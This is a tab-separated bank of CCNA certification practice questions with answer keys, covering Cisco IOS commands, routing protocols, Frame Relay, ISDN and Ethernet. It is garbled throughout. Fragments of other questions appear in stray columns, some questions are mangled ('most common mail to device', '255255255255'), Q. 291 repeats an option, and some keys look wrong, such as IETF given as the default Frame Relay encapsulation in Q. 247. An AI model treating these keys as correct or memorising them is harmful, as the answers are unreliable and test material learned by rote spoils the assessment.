C	#CCNA Q. 271	You have just finished configuring a router. The changes have been made successfully and everything is working correctly. You then save your changes and reboot the router. None of your changes are active after reboot. However, when you look at the contents of startup-config, your changes are there. Which of the following indicates the source of the problem?	^A: Hardware failure in NVRAM prevents the router from loading the configuration.	^B: Startup-config in flash is corrupt and cannot be analyzed.	^C: Router configuration register set to bypass startup configuration.	^D: Startup-config in NVRAM is corrupt and cannot be analyzed							
C	#CCNA Q. 247 	What is the default encapsulation type for Frame Relay on a Cisco router? 	^A: HDLC 	^B: PPP 	^C: IETF 	^D: Cisco 	^E: ANSI 						
C	#CCNA Q. 110	What is the most common Layer 2 device?	^A: Hub	^B: Router	^C: Switch	^D: Repeater							
D	#CCNA Q. 165	What is the most common mail to device?	^A: Hub	^B: Router	^C: Repeater	^D: Switch							
B	#CCNA Q. 305	Which device can be used to segment broadcast domains?	^A: hub	^B: router	^C: bridge	^D: repeater							
C,D,E	#CCNA Q. 239 	Which devices can be used to segment a network? (Choose three) 	^A: hub 	^B: repeater 	^C: switch 	^D: bridge 	^E: router 	^F: media converter 					
C	#CCNA Q. 216 	Which type of LAN segmentation device enables high-speed data exchange? 	^A: Hub 	^B: Bridge 	^C: Switch 	^D: Repeater 							
A	#CCNA Q. 288	A user issues the command ping 204.211.38.52. Which of the following physical is used to test physical connectivity between the two devices?	^A: ICMP echo request	^B: Information request	^C: timestamp reply	^D: redirect	^E: source quench						
C,E,F	#CCNA Q. 244 	Which of the following are options for Frame Relay lmi types? (Choose three) 	^A: IETF 	^B: Q931 	^C: Q933A 	^D: IEEE 	^E: CISCO 	^F: ANSI 					
B,C	#CCNA Q. 253 	Which of the following statements describe the codes displayed in the show ip route command? (Choose two.) 	^A: I-Indicates a route was learned through an Internal protocol. 	^B: S-Indicates a route was learned through static command. 	^C: R-Indicates a route was learned through RIP 	^D: S-Indicates a route was learned through a serial port. 	^E: R-Indicates a route was learned through a reliable port. 						the testing application.
A	#CCNA Q. 211 	What is the result of using hierarchical addressing framework? 	^A: Increase availability of addresses. 	^B: Decrease distance between routers. 	^C: Increase router memory requirements. 	^D: No need to maintain routing information. 							
B	#CCNA Q. 55	What must you do to test connectivity on a dial-on-demand routing (DDR) link?	^A: Increase the idle timeout parameter.	^B: Send interesting traffic across the link.	^C: Reboot one of the Integrated Services Digital Network (ISDN) routers.	^D: Reset the DDR Integrated Services Digital Network (ISDN) router statistics to zero.							
B,C,E	#CCNA Q. 21	What are the effects of sustained, heavy collisions in CSMA/CD LANs? (Choose three)	^A: Increased broadcast traffic	^B: Delay	^C: Low throughput	^D: High throughput	^E: Congestion	^F: Higher bandwidth					
B	#CCNA Q. 286	What must you do to test connectivity on a dial on demand routing (DDR) link?	^A: Increase the idle timeout parameter	^B: Send interesting traffic across the link	^C: Switch	^D: Repeater							
B	#CCNA Q. 287	You got a new testing application on a new server in your office. This testing application work with a few hosts. The new server and hosts work with 10 Mbps and make a bandwidth problem for all the rest nontesting hosts. The rest of the hosts in your office network with 2 Mbps. What is the most economical decision would you implement for resolving this problem?	^A: Install new 100 Mbps switches, and change all host's NIC to 100 Mbps.	^B: Segment network with router, and place all testing hosts and the new server into a separate subnet (network).	^C: Add a Bridge and separate the two networks							
A	#CCNA Q. 282	What output interface status would you see if peer interface (on second end of link) is administratively down?	^A: interface is down, line protocol is down	^B: interface is down, line protocol is up	^C: interface is up, line protocol is down	^D: interface is up, line protocol is up						
A	#CCNA Q. 91	Which command specifies a second subinterface on serial interface zero?	^A: interface s 0.2 point - to point	^B: interface 2 s 0 point to point	^C: sub interface 2 s 0 point to point	^D: interface 0 sub 2 point to point	^E: interface s 0.1 point to point sub 2					
C	#CCNA Q. 156	What is the connection-oriented protocol in the TCP/IP protocol stack?	^A: IP	^B: UDP	^C: TCP	^D: DNS	^E: OSPF					
D	#CCNA Q. 212 	What is the link state routing protocol in the TCP/IP protocol stack? 	^A: IP 	^B: IS-IS 	^C: NLSP 	^D: OSPF 	^E: RIP ver 2 					
D	#CCNA Q. 148	Which encapsulation methods are most commonly used with dialup integrated services Digital Network (ISDN)?	^A: IP and IPX	^B: IP and PPP	^C: PPP and SDLC	^D: PPP and HDLC						
B,D	#CCNA Q. 93	Which two statements accurately define IP addressing rules? (Choose Two)	^A: IP multicast addresses start with 240	^B: A host portion of all 1's indicates a network broadcast	^C: The value of zero (0) in the host portion means "all hosts" on the network	^D: IP addresses are four octets long and contain a network portion and a host portion						
A,C,E	#CCNA Q. 82	Which three statements about common elements of the TCP/IP protocol stack are true? (Choose three)	^A: IP provides connection less service and routing capabilities.	^B: ARP enables devices to locate the IP address of local devices.	^C: UDP provides simple connection less service without windowing or acknowledgements.	^D: ICMP provides connection oriented management data to routers and layer three switches.	^E: TCP enables devices to send large quantities of data using switching in a connection-oriented	manner.				
A	#CCNA Q. 206 	What is the protocol and what is the second part of the following network address? 255255255255	^A: IP, a flooded broadcast 	^B: IP, a directed broadcast 	^C: IPX, a flooded broadcast 	^D: IPX, a remote directed broadcast 						
C	#CCNA Q. 161	When you configure an IP address on a Cisco Router, which command starts the IP processing on the interface?	^A: IP-Space enable	^B: Network IP-Address	^C: IP address IP-address subnet mask.	^D: The exit command from the enable configuration	^E: Copy running-configuration to startup-configuration					
C	#CCNA Q. 291	Given an IPX network with redundant paths, what command will configure load balancing?	^A: ipx load-balance	^B: ip maximum-paths 2	^C: ip maximum-paths 2	^D: ipx load-share						
C	#CCNA Q. 283	What is the protocol and what is the second part of the following network address? (Choose all that apply.) 172.161.0.254 mask 255.255.0.0	^A: IPX MAX address 	^B: IP Class C director broadcast 	^C: Private IP address node number 	^D: Public IP address directed broadcast 	^E: Private IP address directed broadcast 					
C	#CCNA Q. 70	What is the protocol and what is the second part of the following network addresses 172.16.0.254 , mask=255.255.0.0?	^A: IPX:MAC addresses.	^B: IP:classC directed broadcast.	^C: Private IP address:node number	^D: Public IP addresses:directed broadcast.	^E: Private IP addresses directed broadcast.					
A	#CCNA Q. 310	Which of the following WAN services use two data link layer encapsulations, one for data and one for signaling?	^A: ISDN	^B: Frame Relay	^C: ATM	^D: FDDI						
B	#CCNA Q. 4	Which IOS command is used to associate an ISDN phone number with the next hop router address?	^A: isdn destination number	^B: dialer map	^C: isdn spid1	^D: isdn line number						^D: That a bridge be placed between the enterprise server and all other users with the exception of
B,C	#CCNA Q. 119	Which two statements about integrated services digital network (ISDN) are true? (Choose two)	^A: ISDN provides only data only capability.	^B: ISDN provides an integrated voice/data capability.	^C: The ISDN standards define the hardware and call setup schemes for end-to-end digital connectivity.	^D: Users receive more bandwidth on WANs with a leased line of 56kbps than with multiple b channels.						
A	#CCNA Q. 22	Modern networks are often described as using 100Base-TX components. What is meant by the term 'Base' in this definition?	^A: It describes the signaling method for communication on the network.	^B: It refers to the type of media used in the network.	^C: It relates to the speed of transmission of network signals.	^D: It defines the allowable length of media that can be used.	^E: It defines half-duplex or full-duplex operation.		
C,D	#CCNA Q. 54	What are two characteristics of the RARP protocol? (Choose two.)	^A: It generates parameter problem messages.	^B: It maps IP addresses to Ethernet addresses.	^C: It maps Ethernet addresses to IP addresses.	^D: It is implemented directly on top of the data link layer.			
A	#CCNA Q. 52	What is a benefit of a virtual LAN (VLAN)?	^A: It increases the number of broadcast domains.	^B: It decreases the number of broadcast domains.	^C: It increases the number of collision domains.	^D: It decreases the number of collision domains.	^E: Since it is a virtual interface, it never shuts down.		
A	#CCNA Q. 14	What is the result of segmenting a network with a bridge?	^A: It increases the number of collision domains.	^B: It decreases the number of collision domains.	^C: It increases the number of broadcast domains.	^D: It decreases the number of broadcast domains.			
D	#CCNA Q. 75	What is the result of segmenting a network with a router into segments 1 and 2?	^A: It increases the number of collisions.	^B: It decreases the number of broadcast domains.	^C: It connects segment one's broadcast to segment two.	^D: It prevents segment one's broadcast from getting to segment two.			
B,E	#CCNA Q. 192	Assuming no subnetting, which two pieces of information can be derived from the IP address 144.132.25.10? (Choose Two)	^A: It is a Class C address	^B: It is a Class B address	^C: The network address is 144.0.0.0	^D: The network address is 144.132.25.0	^E: The host portion of the address is 25.10		
A	#CCNA Q. 164	Which statement about the data-link connection identifier (DLCI) is true?	^A: It is a number that identifies a local virtual circuit in a Frame Relay network.	^B: It is a signaling standard between the CPE device and the Frame Relay switch.	^C: It is the clock speed (port speed) of the connection (local loop) to the Frame Relay cloud.	^D: It is the maximum number of uncommitted bits that the Frame Relay switch will attempt to transfer	beyond the committed information rate (CIR).		
A	#CCNA Q. 47	Which of the following are not true of standard half-duplex Ethernet circuitry?	^A: It is alternate one-way communication.	^B: The receive (RX) is wired directly to the transmit (TX) of the remote station.	^C: The receive (TX) is wired directly to the receive (RX) of the remote station.	^D: Collisions are not possible.	^E: Both stations can transmit simultaneously.		
C	#CCNA Q. 126	What is a backoff on an 802.3 network?	^A: It is latency in store and forward switching.	^B: It is the time used for token passing for machine to machine.	^C: It is the retransmission delay that is reinforced when a collision occurs.	^D: It is the result of two nodes transmitting at a same time the frames from each transmitting device	collide and are damaged.		
C	#CCNA Q. 189	What is back off on an 802.3 network?	^A: It is latency in store and forward switching.	^B: It is the time used for token passing from machine to machine.	^C: It is the retransmission delay that is encountered when a collision occurs.	^D: It is the result of two nodes transmitting at the same time the frames from each transmitting device collide	and are damaged.		
D	#CCNA Q. 138	What are the characteristics of UDP?	^A: It is reliable and acknowledged	^B: It is unreliable and acknowledged	^C: It is reliable and unacknowledged	^D: It is unreliable and unacknowledged			
A	#CCNA Q. 72	Which statement about the Committed Information Rate (CIR) is true?	^A: It is the rate, in bits per second, at which the Frame Relay switch agrees to transfer data	^B: It is the clock speed (port speed) of the connection (local loop) to the Frame Relay cloud	^C: It is the maximum number of bits that the switch can transfer during any Committed Rate	Measurement Interval	^D: It is a signaling standard between the CPE device and the FR switch. It is responsible for managing	the connection and maintaining status between the devices.	
D,F	#CCNA Q. 62	Which two statements about IP RIP are true? (Choose two.)	^A: It limits hop counts to 31.	^B: It is a link-state routing protocol.	^C: It uses autonomous system numbers.	^D: It is capable of load sharing over multiple paths.	^E: It uses bandwidth as the metric for path selection.	^F: It broadcasts updates every 30 seconds by defaults	
B	#CCNA Q. 63	How does inter-VLAN communication take place?	^A: It takes place through any Cisco router.	^B: It takes place through a Cisco router than can run ISL.	^C: It takes place through a router, but this disables all the router's Security and filtering functionality for the	VLANs.	^D: For nonroutable protocols, (e.g., NetBEUI) the router provides communications between VLAN	domains.	^E: Inter-VLAN communications is not possible because each VLAN is a separate broadcast domain.
B	#CCNA Q. 81	Using the TCP/IP suite a message is sent from host A to a destination IP address on the same LAN. How does host A determine the destination's MAC address?	^A: It uses a Proxy ARP.	^B: It uses ARP requests.	^C: It uses RARP requests.	^D: It uses router look up table.			
A,B,C,G	#CCNA Q. 74	What are four function/characteristics of the network layer of the OSI model? (Choose four)	^A: It uses a two-part address.	^B: It maintains routing tables.	^C: It uses broadcast addresses.	^D: It establishes network addresses.	^E: It provides access to the LAN media.	^F: It provides media independence for upper layers.	^G: It provides path selection for Internet work communication.
B,C	#CCNA Q. 233 	Which two statements about the store and forward switching method are true? (Choose two) 	^A: Latency remains constant regardless of frame size. 	^B: Latency through the switch varies with frame length. 	^C: The switch receives the complete frame before beginning to forward it. 	^D: The switch checks the destination address as soon as it receives the header and begins forwarding the 	frame immediately. 				
E	#CCNA Q. 183	Which command assigns the login password Cisco on the console terminal line?	^A: line vty 0	Log in	Password Cisco	^B: Line console	Login	Password Cisco	^C: Line login terminal	Password Cisco	^D: Line console 0	Password CISCO	^E: Line console 0	Login	Password Cisco
D,E	#CCNA Q. 261	Which of the following are used to prevent routing loops in networks that use distance vector routing protocols? (Choose two.)	^A: link-state advertisement (LSA)	^B: Spanning Tree Protocol	^C: shortest path first tree	^D: split horizon	^E: hold-down timers				
A,B,E	#CCNA Q. 76	Which three basic switch functions increase available bandwidth on the network? (Choose three)	^A: Loop avoidance.	^B: Address learning	^C: Hop count limiting	^D: Broadcast filtering	^E: Packet forward/filtering.				
A,B	#CCNA Q. 139	What are the two sublayers of the data link layer? (Choose two)	^A: MAC	^B: LLC	^C: SAP	^D: LCP	^E: NetWare Core Protocol (NCP)				
A	#CCNA Q. 199	You telnet to a host on a remote network. Which MAC address will be present in the ARP table when you issue the show arp command?	^A: MAC address of the destination host Ethernet port.	^B: MAC address of the local router Ethernet port	^C: MAC address of the destination router Serial port	^D: MAC address of the local router Serial Port					
A,C,D	#CCNA Q. 242 	Which of the following should be done prior to backing up an IOS image to a network server? (Choose three) 	^A: Make sure that the network server can be accessed. 	^B: Check that the authentication for access is set. 	^C: Assure that the network server has adequate space for the code image. 	^D: Verify any file naming and path requirements. 	^E: Make sure that the server can load and run the bootstrap code. 				
B,C	#CCNA Q. 285	Which of the following metrics does IGRP use by default to determine the best path to destination? (Choose two.)	^A: Maximum Transmission Unit	^B: Cumulative Interface delay.	^C: Path bandwidth value.	^D: Reliability from source to destination.	^E: Link loading in bits-per-second.	^F: Hold-down timers for updates.			
A,B,E	#CCNA Q. 10	Which devices operate at all seven layers of the OSI model? (Choose three)	^A: Network host	^B: Network management station	^C: Transceiver	^D: Bridge	^E: Web server	^F: Switch			
A,C	#CCNA Q. 135	Which are two ways IPX supports multiple logical networks on an individual interface? (Choose two)	^A: Network number	^B: Routing protocol	^C: Encapsulation type	^D: Autonomous system number					
C	#CCNA Q. 118	What are two components of an IPX address?	"^A: Network number; IP address."	"^B: MAC address; node number."	"^C: Network number; MAC address."	"^D: Network number; subnet number."					
A,C	#CCNA Q. 324	Which of the following are generally considered to be characteristics of connectionless network services? (Choose two.)	^A: non-reliable	^B: reliable	^C: less bandwidth-intensive	^D: handshaking					
B,D	#CCNA Q. 246 	In contrast to connectionless services, which of the following are generally regarded as characteristics of  connection-oriented network services? (Choose two.) 	^A: non-reliable 	^B: reliable 	^C: less bandwidth-intensive 	^D: handshaking 					
A,B	#CCNA Q. 263	Which of the following need to be modified in the password recovery process? (Choose two.)	^A: nvram	^B: configuration register	^C: boot flash	^D: cmos	^E: flash				
C	#CCNA Q. 87	How many collisions are caused by transmitting and receiving frames simultaneously in a full-duplex Ethernet Technology?	^A: One	^B: Two	^C: None	^D: Several					
C	#CCNA Q. 316	Based on the debug output shown, what type of handshake occurred for PPP authentication? 	^A: one-way 	^B: two-way 	^C: three-way 	^D: no handshake required during authentication. 					
A	#CCNA Q. 231	What is a disadvantage of using a connection-oriented protocol such as TCP? 	^A: Packet acknowledgement may add overhead 	^B: Packets are not tagged with sequence numbers 	^C: Loss or duplication of data packets is more likely to occur 	^D: The application layer must assume responsibility for correct sequencing of the data packets. 		
C	#CCNA Q. 116	What is an advantage of using a connectionless protocol such as UDP?	^A: Packet acknowledgement may reduce overhead traffic.	^B: Loss or duplication of data packets is less likely to occur.	^C: Packets are not acknowledged which reduces overhead traffic.	^D: The application relies on the transport layer for sequencing of the data packets.		
C	#CCNA Q. 53	IP RIP routing is configured on a router, but all interfaces attach to RIP network. What should you use to prevent all RIP routing updates from being sent through selected interfaces without using access lists?	^A: Passive route	^B: Default routes	^C: Passive interface	^D: Route update filtering		
B	#CCNA Q. 45	Which of the following commands applies to an access control list to a router interface?	^A: permit access-list 101 out	^B: ip access-groups 101 out	^C: apply access-list 101 out	^D: access-class 101 out	^E: ip access-list e0 out	
A	#CCNA Q. 241 	What is the effect of the following access list condition? access-list 101 permit ip 10.25.30.0 0.0.0.255 any 	^A: Permit all packets matching the first three octets of the source address to all destinations. 	^B: Permit all packets matching the last of the destination address and accept all source address. 	^C: Permit all packets from the third subnet of the network address to all destinations. 	^D: Permit all packets matching the host bits in the source address to all destinations. 	^E: Permit all packets to destination matching the first three octets in the destination address. 	
F	#CCNA Q. 12	At which OSI layer does data translation and code formatting occur?	^A: Physical	^B: Data link	^C: Network	^D: Transport	^E: Session	^F: Presentation
A	#CCNA Q. 318	Which command sends and receives ICMP echo messages to verify connectivity from host to host?	^A: ping	^B: tracert	^C: netstat	^D: show cdp neighbors details	^E: show ip route	^F: traceroute 
A,D,F	#CCNA Q. 20	Which commands could be used at the command line interface to troubleshoot LAN connectivity problems on a router? (Choose three)	^A: ping	^B: tracert	^C: ipconfig	^D: show ip route	^E: winipcfg	
B,C	#CCNA Q. 295	Which of the following are application layer protocols? (Choose two.)	^A: Ping	^B: Telnet	^C: FTP	^D: TCP	^E: IP	
A,B	#CCNA Q. 26	Which two commands allow you to verify address configuration in your internetwork?	^A: Ping	^B: Trace	^C: Verify	^D: Test IP	^E: Echo IP	^F: Config IP
A,D	#CCNA Q. 84	Which two protocol tools use ICMP? (Choose two)	^A: Ping	^B: Telnet	^C: Configure	^D: Trace route	^E: Show commands	^F: Standard access list
D	#CCNA Q. 307	You are unable to telnet to a router at address 203.125.12.1 from a workstation with the IP address of 203.125.12.23. You suspect that there is a problem with your protocol stack. Which of the following actions is most likely to confirm your diagnosis?	^A: ping 127.0.0.0	^B: ping 203.125.12.1	^C: telnet 127.0.0.1	^D: ping 127.0.0.1	^E: tracert 203.125.12.1	
A,B	#CCNA Q. 266	What do you use for loop avoidance? (Choose two.)	^A: Poison reverse.	^B: Split horizon.	^C: Link state protocol.			
A,D	#CCNA Q. 143	Which two WAN data link layer protocols support multiple upper layer protocols? (Choose Two)	^A: PPP	^B: LAPD	^C: ISDN	^D: HDLC		
C	#CCNA Q. 147	Which statement about the Point-to-Point protocol (PPP) is true?	^A: PPP supports TCP/IP, but not Novell IPX	^B: PPP is being phased out of existence by the Serial Line Internet protocol	^C: PPP provides router-to-router and host-to-network connections over both synchronous and	asynchronous circuits.	^D: PPP is an ITU-T and ANSI standard that defines the process for sending data over a packet-switched	data network
C,D,E	#CCNA Q. 151	What are three benefits of integrated services digital network (ISDN)? (Choose three)	^A: PVCs are faster and more reliable.	^B: No specialized equipment is required.	^C: Data transfer is faster than typical modems.	^D: Call setup is faster than with standard telephone service.	^E: It carries many types of data traffic such as voice, video, and data.	
D	#CCNA Q. 298	Which type of router memory normally stores the start-up configuration?	^A: RAM	^B: ROM	^C: FLASH	^D: NVRAM										
A	#CCNA Q. 303	What function does the up arrow key provide within the Cisco router IOS?	^A: Recalls the previous command line.	^B: Moves the cursor one line up.	^C: Redisplays the current command line.	^D: Capitalize the command line.										
A,C	#CCNA Q. 223 	Which two statements about a reliable connection oriented data transfer are true? (Choose two) 	^A: Recipients acknowledge receipt of data. 	^B: When buffers are filled to capacity, datagrams are discarded and not re transmitted. 	^C: Windows are used to control the amount in outstanding acknowledged data segments. 	^D: If the segments timer expires between receipt of an acknowledgement the sender drops the connection. 	^E: The receiving device waits for acknowledgements from the sending device before accepting more data 	segments. 								
A,B,F	#CCNA Q. 293	Which of the following are associated with the Presentation Layer of the OSI model? (Choose three)	^A: Rich Text Format (RTF)	^B: Quick Time movie	^C: FTP	^D: TFTP	^E: SMTP	^F: MIDI					Password CISCO	^E: Line console 0	Login	Password Cisco
C	#CCNA Q. 38	Which of the following protocols utilizes features of both distance-vector and link-state routing?	^A: RIP	^B: OSPF	^C: EIGRP	^D: IGRP										
B	#CCNA Q. 176	Which router component stores routing tables, ARP cache, and packet buffers?	^A: ROM	^B: RAM	^C: NVRAM	^D: Flash memory										
A	#CCNA Q. 162	When you issue the command show version, your router returns: -Configuration register is 0x0101- From where does the router boot?	^A: ROM	^B: NVRAM	^C: FLASH	^D: A TFTP server										
E	#CCNA Q. 109	Which line from a show spantree 1 command output indicates that virtual LAN1 (VLAN1) is functioning properly?	^A: Root port is fast Ethernet 0/26	^B: Port Ethernet 0/1 of VLAN is forwarding	^C: Designated port is Ethernet 0/1, path cost 10	^D: Designated root has priority 0 address 00D0.588F.B600	^E: VLAN is executing the IEEE compatible spanning tree protocol.
B	#CCNA Q. 80	What is a function of a reliable transport layer connection?	^A: Route selection	^B: Acknowledgement	^C: Session checkpoints	^D: System authentication
E,F,G	#CCNA Q. 207	Which three protocols exactly match their transport layer functions? (Choose three)	^A: Route selection-IP	^B: Sliding window-UDP	^C: Well known ports-IP	^D: Route validation-ICMP	^E: Connection oriented-TCP/IP	^F: Three way handshake-TCP/IP	^G: No acknowledgement-UDP
A	#CCNA Q. 89	Which commands should you use to enable IGRP routing?	^A: router igrp 100	network 192.168.1.0	network 10.0.0.0	^B: router igrp 100	network 192.168.1.0	network 10.2.0.0	^C: router igrp 100	network 192.168.1.0 192.168.1.1	network 10.2.0.0 10.2.1.1					
D	#CCNA Q. 301	Rachel is adding a balanced hybrid routing protocol to her network. Which of the following commands would she use to start the routing process?	^A: router rip	^B: router igrp 100	^C: router ospf 1	^D: router eigrp 100										
B	#CCNA Q. 227 	Which command would you use to enable IP RIP version 1 on a router? 	^A: Router RIP 	network 172.16.1.0 	network 10.1.0.1 	^B: Router RIP 	network 172.16.0.0 	network 10.0.0.0 	^C: Router RIP 	network 172.16.1.0 172.16.1.1 	network 10.1.0.0 10.1.1.1 					
D	#CCNA Q. 120	Which prompt and command combination sets RIP as the routing protocol?	^A: Router# rip.	^B: Router rip.	^C: Router (Config)# rip.	^D: Router (Config)# router rip.										
C	#CCNA Q. 98	Which router command allows you to view the entire contents of all access lists?	^A: Router# show interface	^B: Router> show IP interface	^C: Router# show access-list	^D: Router> show all access list										
A	#CCNA Q. 97	Which router command allows you to determine if an IP access list is enabled on a particular interface?	^A: Router# show ip interface	^B: Router> show access-list	^C: Router# show ip access-list	^D: Router> show interface ip access-list										
B	#CCNA Q. 65	Which configuration mode and command combination sets the bandwidth metric of a Frame Relay connection?	^A: router(Config)# clock rate 56	^B: router(Config-if)# bandwidth 56	^C: router(Config)# bandwidth 56000	^D: router(Config-if)# clock rate 56000								
C	#CCNA Q. 202	Which command sets IGRP as the routing protocol for autonomous system 100? 	^A: Router(config)# igrp 100 	^B: Router(config)# network 100 	^C: Router(config)# router igrp 100 	^D: Router(config)# enable igrp 100 						^E: Access List 101 deny IP 128.12.22.55 TCP EQ 20 21 23		
A	#CCNA Q. 289	"How do you change the Console password to ""cisco""?"	^A: Router(config)# line con 0 Router(config-line)# login Router(config-line)# password cisco	^B: Router(config)# line con 0 Router(config-line)# login Router(config-line)# password Cisco
D	#CCNA Q. 144	Which command enables directly connected network 199.55.72.0 to be used by RIP?	^A: Router(Config)# rip 199.55.0.0	^B: Router(Config-router)# rip 199.55.72.0	^C: Router(Config-router)# network 199.55.0.0	^D: Router(Config-router)# network 199.55.72.0								
C	#CCNA Q. 312	Which command correctly configures an IP address on a Cisco router interface?	^A: router(config-if)# ip address 172.18.32.1 subnet mask 255.255.252.0	^B: router(config-if)# 172.18.32.1 255.255.252.0	^C: router(config-if)# ip address 172.18.32.1 255.255.252.0	^D: router(config-if)# 255.255.252.0 subnet mask 255.255.252.0	^E: router(config-if)# ip address 172.18.32.1/22	^F: router(config-if)# ip address 172.18.32.1 subnet mask /22						
B	#CCNA Q. 85	Which command successfully pings an individual IP address?	^A: Router>ping 192.5.5.0	^B: Router# ping 192.5.5.30	^C: Router> ping 192.5.5.256	^D: Router# ping 192.5.5.255
D	#CCNA Q. 170	Which encapsulation type should be used for the e1 port of Router R3?	^A: SAP	^B: HDLC	^C: ARPA	^D: Novell-Ether								
B	#CCNA Q. 111	Which encapsulation type should be used for the S0 port of Router R2?	^A: SAP	^B: HDLC	^C: ARP	^D: NOVELLETHER								
B	#CCNA Q. 169	Which encapsulation type should be used for the S0 port of router R2?	^A: SAP	^B: HDLC	^C: ARPA	^D: Novel Ether								
D	#CCNA Q. 60	Which show interface serial 1 status statement indicates that the shutdown command was issued on that interface?	^A: Serial 1 is up, line protocol is up.	^B: Serial 1 is up, line protocol is down.	^C: Serial 1 is down, line protocol is down.	^D: Serial 1 is administratively down, the line protocol is down.								
C	#CCNA Q. 302	Which command must be entered when connecting two routers without external DCE devices via a serial link?	^A: serial up	^B: line protocol up	^C: clock rate	^D: dce rate	^E: dte rate
B	#CCNA Q. 133	At which layer of the OSI model does the ping command operate?	^A: Session	^B: Network	^C: Transport	^D: Maintenance							network 172.16.1.0 265.255.255.0 	Network 10.1.0.0 255.255.0.0 
B	#CCNA Q. 104	If you are in IOS user mode which command do you use to enter the privileged mode?	^A: Set	^B: Enable	^C: Configure	^D: Privileges								
A	#CCNA Q. 127	You have just issued an erase startup-config command and reloaded your router. In which mode will your router be when you reboot?	^A: Setup.	^B: Startup.	^C: User EXEC.	^D: User privileged.	^E: Global configuration.
A,D	#CCNA Q. 23	Which of the following are unique characteristics of half-duplex Ethernet as compared to full-duplex Ethernet? (Choose two.)	^A: Shared collision domain.	^B: Private collision domain	^C: Higher effective throughput	^D: Lower effective throughput	^E: Private broadcast domain							
C	#CCNA Q. 44	Which command is used to display the placement and direction of an IP access control list on a router?	^A: show access-list	^B: show ip route	^C: show ip interface	^D: show interface	^E: show interface list							
A	#CCNA Q. 191	Which command displays access list 111?	^A: Show access-list 111	^B: Show IP access list 111	^C: Display IP address list 111	^D: Display access-list 111 details						
D	#CCNA Q. 167	Which ex command displays system configuration information, software version and the names and sources of configuration files and boot images on a router?	^A: show boot	^B: show flash	^C: show Config	^D: show version						
B	#CCNA Q. 159	Which command displays the interfaces using a given access list?	^A: Show filters	^B: Show IP interface	^C: Show active list	^D: Show interface parameters	^E: Configure IP access list	^F: Show access-list interfaces				Login
B,C	#CCNA Q. 146	Which two commands show your access lists? (Choose two)	^A: Show filters.	^B: Show access-lists	^C: Show IP access-list	^D: Show running-Config						
E	#CCNA Q. 137	In Cisco IOS software, which command displays the backup configuration?	^A: show flash	^B: show version	^C: show tftp-config	^D: show backup-config	^E: show startup-config					
B,D	#CCNA Q. 269	Which commands will allow you to identify the local dlci number? (Choose two.)	^A: show frame-relay local-dlci	^B: show frame-relay pvc	^C: show frame-relay dlci	^D: show frame-relay map	^E: show ip route					
A	#CCNA Q. 132	Which command displays the IP addresses assigned to specific host names?	^A: show hosts	^B: show interface	^C: ping host name	^D: config host name	^E: show host mapping	^F: show host name IP address	^G: trace IP addresses host name			
A	#CCNA Q. 160	You have a Frame Relay Link on serial1. Which command displays the Local Management Interface (LMI), data link connection identifier (DLCI), and bandwidth for that link?	^A: show interface serial1	^B: show frame-relay serial1	^C: show protocol frame-relay serial1	^D: show serial1 encapsulation frame-relay						
B	#CCNA Q. 129	Which command verifies encapsulation as well as layer 1 and layer 2 statistics on a router configured for Frame Relay?	^A: show IP	^B: show interface	^C: show statistics	^D: show frame-relay						
C	#CCNA Q. 43	Which command will provide you with information regarding the Layer 3 configuration of directly connected router interfaces?	^A: show ip interface	^B: show cdb neighbors	^C: show cdp neighbors detail	^D: show ip route	^E: show ip link status					
B,C	#CCNA Q. 150	Your network is having IP problems connecting to one or more Frame Relay peer routers. Which two commands should you use to show the routers that are reachable? (Choose two)	^A: show IP map	^B: show IP route	^C: show frame-relay map	^D: debug frame-relay map						
C	#CCNA Q. 300	Which command displays RIP routing updates as they are sent and received by the router?	^A: show ip protocols	^B: show ip route rip	^C: debug ip rip	^D: debug ip updates	^E: debug ip transactions
B	#CCNA Q. 88	Which Cisco IOS command should you use to display the Novell IPX address assignments on a router?	^A: Show IPX addresses.	^B: Show IPX interface.	^C: IPX network <number>	^D: Display IPX addresses	^E: Show IPX routing details
E	#CCNA Q. 90	Which show command should you use to view Frame Relay local management interface (LMI) traffic statistics?	^A: show lmi	^B: show ip route	^C: show interface	^D: show statistics	^E: show frame-relay lmi					
D	#CCNA Q. 28	Which command displays all routed protocols and the interfaces on which the protocol is enabled?	^A: show protocols	^B: show protocol brief	^C: show interfaces protocol	^D: show interfaces	^E: show routed	^F: show routed interfaces				
D	#CCNA Q. 2	Which command displays the configuration register setting?	^A: show register	^B: show flash	^C: show boot (this IOS command displays the settings of the boot environment variables)	^D: show version
A	#CCNA Q. 214 	What is an advantage of local area network LAN segmentation? 	^A: Smaller collision domains. 	^B: Elimination of broadcast. 	^C: Decrease cost of implementation. 	^D: Larger number of users within the same domain. 						
A,D	#CCNA Q. 67	In order to enable RIP which two tasks need to be performed? (Choose two)	^A: Specify the routing protocol.	^B: Configure static Rip routes.	^C: Specify directly connected subnets.	^D: Specify directly connected networks.						
A,B	#CCNA Q. 177	Which two solutions are used to reduce the chance of distance vector routing loops? (Choose two)	^A: Split horizon	^B: Route Poison	^C: Area Hierarchies	^D: Link State Algorithms
A,C	#CCNA Q. 140	Which two types of route table entries does a Layer 3 router use to determine the appropriate path to a destination? (Choose two)	^A: Static route entry	^B: Default route entry	^C: Dynamic route entry	^D: Temporary route entry	^E: Permanent route entry
A	#CCNA Q. 260	What type of switching creates variable latency through the switch?	^A: Store-and-forward	^B: Cut-through	^C: Fragment-free
B	#CCNA Q. 256	In which switching mode does the switch read the first part of the frame, with the destination address, and send the frame immediately?	^A: Store-and-forward	^B: Cut-through	^C: Fragment-free
C	#CCNA Q. 11	With the hierarchical numbering of IP addresses what determines the portion of the address that will identify the network number?	^A: Subnet Mask	^B: Dots between octets	^C: Class of first octet	^D: Assignments of DHCP	^E: Address Resolution Protocol					
A,B,E	#CCNA Q. 276	Which connection allows the use of full-duplex Ethernet? (Choose three)	^A: Switch to host.	^B: Switch to switch.	^C: Hub to hub.	^D: Switch to hub.	^E: To host.
A,B	#CCNA Q. 236	Full Duplex Ethernet can operate between which of the following devices? (Choose two.)	^A: Switch to host.	^B: Switch to switch.	^C: Hub to hub.	^D: Switch to hub.	^E: Hub to host.
B,D,F	#CCNA Q. 17	Which of the following statements are true regarding bridges and switches? (Choose three)	^A: Switches are primarily software based while bridges are hardware based.	^B: Both bridges and switches forward Layer 2 broadcasts.	^C: Bridges are frequently faster than switches.	^D: Switches have a higher number of ports than most bridges.	^E: Bridges define broadcast domains while switches define collision domains.	^F: Both bridges and switches make forwarding decisions based on Layer 2 addresses.
